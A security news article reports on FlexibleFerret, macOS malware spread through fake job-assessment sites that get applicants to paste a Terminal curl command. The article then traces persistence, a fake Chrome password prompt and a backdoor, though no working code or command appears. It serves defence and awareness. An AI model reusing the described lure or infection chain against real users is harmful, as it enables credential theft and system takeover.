Cybercriminals are successfully targeting Apple users through a sophisticated social engineering scheme that tricks victims into running harmful commands on their computers.
The threat, called FlexibleFerret, is attributed to North Korean operators and represents a continuing evolution of the Contagious Interview campaign that has been active throughout 2025.
The malware primarily spreads through fake job recruitment websites that promise employment opportunities but ultimately deliver credential-stealing backdoors and system access to attackers.
.webp "Hackers Tricks macOS Users to Execute Command in Terminal to Deliver FlexibleFerret Malware 2")
The attack begins innocuously with job seekers visiting realistic-looking hiring assessment websites like evaluza.com and proficiencycert.com.
Victims complete fake job assessments branded with names like “Blockchain Capital Operations Manager Hiring Assessment,” providing personal details and even recording video introductions.
After completing these stages, applicants receive a critical instruction to run a specific Terminal command, which the attackers claim is needed to fix camera or microphone access issues.
Jamf security analysts identified this new variant after discovering in-the-wild detections linked to the script named macpatch.sh.
The researchers found JavaScript files on fraudulent recruitment sites designed to build and execute curl commands that download malicious payloads directly to victims’ computers.
Infection mechanism
The infection mechanism employs a multi-stage delivery process that remains hidden from users. When the initial curl command executes, it downloads a shell script that determines whether the victim’s Mac uses ARM64 or Intel architecture, then fetches the appropriate stage-two payload.
The script creates working directories in temporary locations, establishes persistence through LaunchAgents that automatically launch the malware at login, and displays a convincing fake Chrome application that mimics a legitimate password prompt.
.webp "Hackers Tricks macOS Users to Execute Command in Terminal to Deliver FlexibleFerret Malware 4")
This decoy application captures whatever credentials users enter and sends them to a Dropbox account controlled by the attackers.
The third stage activates when a bundled Golang backdoor runs, establishing communication with a command-and-control server.
This sophisticated component supports multiple operations including system information collection, file upload and download capabilities, command execution, Chrome profile theft, and automated credential harvesting.
The backdoor maintains persistence through LaunchAgent entries and includes error-handling mechanisms that reset the malware if temporary failures occur.
Organizations should educate employees to view unsolicited job assessment requests and Terminal-based fix instructions with extreme suspicion.
Any recruitment communication asking users to execute system commands represents a significant red flag and should be reported immediately to security teams.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
